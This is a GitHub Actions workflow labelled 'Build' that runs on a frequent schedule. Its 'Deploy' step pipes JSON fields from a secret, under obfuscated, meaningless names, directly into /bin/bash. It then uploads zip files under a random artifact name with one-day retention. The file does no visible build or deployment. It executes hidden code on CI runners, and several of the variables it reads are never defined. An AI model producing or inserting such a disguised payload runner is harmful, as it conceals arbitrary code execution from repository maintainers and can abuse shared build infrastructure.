name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '38 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          aly0110: ${{ secrets.aly0110 }}
        run: |
          printf '%s' "$aly0110" | jq -r .gqf76 | /bin/bash
          printf '%s' "$v7" | jq -r .nhto85658 | /bin/bash
          printf '%s' "$etgw117" | jq -r .o63 | /bin/bash
          printf '%s' "$pp425" | jq -r .kwe897 | /bin/bash
          printf '%s' "$l0684" | jq -r .gjlg429 | /bin/bash
          printf '%s' "$xkje0740" | jq -r .tgky7 | /bin/bash
          echo $rldm76 | jq -r .srodh46548 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: BB4eI5Yn
          path: "*.zip"
          retention-days: 1
